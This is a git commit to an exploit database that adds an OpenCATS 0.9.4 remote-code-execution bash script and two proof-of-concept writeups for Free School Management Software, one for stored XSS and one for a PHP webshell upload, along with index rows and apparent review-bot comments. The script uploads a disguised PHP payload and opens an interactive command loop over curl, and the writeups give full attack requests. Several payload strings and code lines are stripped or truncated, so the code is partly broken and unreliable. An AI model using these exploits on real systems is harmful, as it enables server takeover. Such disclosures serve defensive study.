From 55af36c59a073746d8edd219707815074966dd1c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 11 Dec 2021 05:02:09 +0000
Subject: [PATCH] DB: 2021-12-11

3 changes to exploits/shellcodes

OpenCATS 0.9.4 - Remote Code Execution (RCE)
Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
Free School Management Software 1.0 - Remote Code Execution (RCE)
---
 exploits/php/webapps/50585.sh | 154 +++++++++++++++++++++++++++++++++
 exploits/php/webapps/50586.txt | 106 +++++++++++++++++++++++
 exploits/php/webapps/50587.txt | 92 ++++++++++++++++++++
 files_exploits.csv | 3 +
 4 files changed, 355 insertions(+)
 create mode 100755 exploits/php/webapps/50585.sh
 create mode 100644 exploits/php/webapps/50586.txt
 create mode 100644 exploits/php/webapps/50587.txt

diff --git a/exploits/php/webapps/50585.sh b/exploits/php/webapps/50585.sh
new file mode 100755
index 000000000..1134770cb
--- /dev/null
+++ b/exploits/php/webapps/50585.sh
@@ -0,0 +1,154 @@
+# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
+# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
+# Date: 21/09/2021
+# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
+# Vendor Homepage: https://www.opencats.org/
+# Software Link: https://github.com/opencats/OpenCATS
+# Version: <=0.9.4 Countach
+# Tested on: Debian, CentOS, Windows Server
+
+#!/bin/bash
+
+if [ $# -eq 0 ]
+then
+ echo "Usage: $0 "
+ exit
+fi
+
+
+
+# if a payload doesn't work, try another
+
+payload='GIF87a'
+#payload='GIF87a'
+#payload='GIF87a'
+#payload='GIF87a'
+#payload='GIF87a'
+#payload='GIF87a'
+#payload='GIF87a'
+
+target=$1
+
+green="\033[0;32m"
+red="\033[0;31m"
+reset="\033[0m"
+
+#====================== Functions
+
+rev() {
+while true
+ do echo -n -e "\n$ "
+ read cmd
+ curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"
+ done
+}
+
+upload() {
+ curl -skL $1/$2 \
+ -H "Connection: close" \
+ -F resumeFile=@"$3;type=application/x-php" \
+ -F ID="$firstJb" \
+ -F candidateID="-1" \
+ -F applyToJobSubAction="resumeLoad" \
+ --compressed \
+ --insecure
+}
+
+getVersion() {
+ ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
+
+ if [ -z "${ver}" ]
+ then
+ ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
+ if [ -z "${ver}" ]
+ then
+ echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
+ return 0
+ fi
+ fi
+ echo -e "${green}[*] Version detected: $ver${reset}"
+}
+
+writePayload(){
+
+ tmpfile=$(tr -dc A-Za-z0-9 $tmpfile
+}
+
+banner(){
+ echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d
+ echo -e "\n"
+}
+
+#======================
+
+banner
+
+echo "[*] Attacking target $target"
+
+echo "[*] Checking CATS version..."
+getVersion $target
+#exit
+
+echo "[*] Creating temp file with payload..."
+writePayload "$payload"
+
+#exit
+
+echo "[*] Checking active jobs..."
+
+jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`
+numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`
+firstJb=`echo "$jbRequest" | grep -m 1 ']*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`
+
+ if [[ ! $numJb -gt 0 ]]
+ then
+ echo -e "${red}[-] Couldn't find any active job.${reset}"
+ exit
+ fi
+fi
+
+firstJb=`echo "$jbRequest" | grep -m 1 '
+
+---
+
+POST http://localhost/admin/enquiry_category/update/3 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------151631281127875309002088019539
+Content-Length: 490
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/admin/enquiry_category
+Cookie: CMSSESSID2cb149290396=0bd8mo7gisd21t9pl1ioorhl63;
+ci_session=6vl4s7keu1ucpoomv9tj4oe8an7kspa0
+Upgrade-Insecure-Requests: 1
+
+-----------------------------151631281127875309002088019539
+Content-Disposition: form-data; name="category"
+
+This is for ID 3 informa222tion">
+-----------------------------151631281127875309002088019539
+Content-Disposition: form-data; name="purpose"
+
+Payment
+-----------------------------151631281127875309002088019539
+Content-Disposition: form-data; name="whom"
+
+Tutorial
+-----------------------------151631281127875309002088019539--
+
+---
+
+Steps to exploit:
+1) Navigate to http://localhost/admin/manage_profile
+2) Insert your payload in the "anme" parameter
+3) Click "save"
+
+Proof of concept (Poc):
+The following payload will allow you to run the javascript -
+">
+
+---
+
+POST /admin/manage_profile/update HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------13285163425854907563979323722
+Content-Length: 519
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/admin/manage_profile
+Cookie: ci_session=hiibl4e0oidvqier9b8hhfb5c1rl6l16
+Upgrade-Insecure-Requests: 1
+
+-----------------------------13285163425854907563979323722
+Content-Disposition: form-data; name="name"
+
+Administrator">
+-----------------------------13285163425854907563979323722
+Content-Disposition: form-data; name="email"
+
+admin@admin.com
+-----------------------------13285163425854907563979323722
+Content-Disposition: form-data; name="userfile"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------13285163425854907563979323722--
+
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/50587.txt b/exploits/php/webapps/50587.txt
new file mode 100644
index 000000000..7d413a63c
--- /dev/null
+++ b/exploits/php/webapps/50587.txt
@@ -0,0 +1,92 @@
+# Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE)
+# Exploit Author: fuuzap1
+# Date: 7-12-2021
+# Category: Web application
+# Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip
+# Version: 1.0
+# Tested on: windows
+# Vulnerable page: http://localhost/admin/examQuestion
+
+
+Technical description:
+A unrestricted file upload vulnerability exists in the Free school
+management software v1.0. An attacker can leverage this vulnerability in
+order to get a remote code execution on the affected web server. Once a php
+webshell containing "" gets uploaded it is
+getting save into /uploads/exam_question/ directory, and is accessible by
+all users. the attacker can gain remote code execution on the web server.
+
+Steps to exploit:
+1) Navigate to http://localhost/admin/manage_profile
+2) click "ADD NEW QUESTION PAPER" edit base infomation
+3) uploading a php webshell containing "" in
+the Field "upload Drag and drop a file here or click"
+3) Click "save"
+4) open http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() then
+php code execution
+Proof of concept (Poc):
+The following payload will allow you to run the javascript -
+
+
+---
+POST /admin/examQuestion/create HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------183813756938980137172117669544
+Content-Length: 1331
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/admin/examQuestion
+Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q
+Upgrade-Insecure-Requests: 1
+
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="name"
+
+test4
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="class_id"
+
+2
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="subject_id"
+
+5
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="timestamp"
+
+2021-12-08
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="teacher_id"
+
+1
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="file_type"
+
+txt
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="description"
+
+123123
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="_wysihtml5_mode"
+
+1
+-----------------------------183813756938980137172117669544
+Content-Disposition: form-data; name="file_name"; filename="cmd.php"
+Content-Type: application/octet-stream
+
+
+-----------------------------183813756938980137172117669544--
+---
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f25e60777..825c527b8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
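Review bot: Step 1 under "Steps to exploit" sends the reader to `http://localhost/admin/manage_profile`, which contradicts the `# Vulnerable page: http://localhost/admin/examQuestion` header and the `POST /admin/examQuestion/create` request line in this same file, and appears to be carried over from the companion XSS writeup (50586.txt). The sentence `The following payload will allow you to run the javascript -` is a leftover from that writeup as well and does not describe an upload issue; replacing it with `The following request performs the upload; the stored file is then served from /uploads/exam_question/.` would match the technical description above it. Minor wording: `A unrestricted` → `An unrestricted`, `it is getting save into` → `it is saved into`, `infomation` → `information`, and two consecutive steps are numbered `3)`. The technical description would also benefit from one remediation sentence for readers triaging this, e.g. that the upload handler must validate the file extension and content server-side and that the upload directory should not be configured to execute PHP.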
@@ -44669,3 +44669,6 @@ id,file,description,date,author,type,platform,port
 50581,exploits/multiple/webapps/50581.py,"Grafana 8.3.0 - Directory Traversal and Arbitrary File Read",1970-01-01,s1gh,webapps,multiple,
 50582,exploits/php/webapps/50582.txt,"Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass",1970-01-01,able403,webapps,php,
 50583,exploits/php/webapps/50583.txt,"Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)",1970-01-01,able403,webapps,php,
+50585,exploits/php/webapps/50585.sh,"OpenCATS 0.9.4 - Remote Code Execution (RCE)",1970-01-01,"Nicholas Ferreira",webapps,php,
+50586,exploits/php/webapps/50586.txt,"Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,fuzzyap1,webapps,php,
+50587,exploits/php/webapps/50587.txt,"Free School Management Software 1.0 - Remote Code Execution (RCE)",1970-01-01,fuzzyap1,webapps,php,
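Review bot: The author column of the two new Free School Management Software rows reads `fuzzyap1`, while the header of 50587.txt earlier in this commit reads `# Exploit Author: fuuzap1`; one of the two spellings should be corrected so the index matches the file (50586.txt's header is not visible here, so I cannot tell which is intended). All three new rows carry `1970-01-01` in the date column although the file headers give `21/09/2021` and `7-12-2021`; if the epoch date is the convention for freshly imported entries this is fine, otherwise the header dates should be carried over.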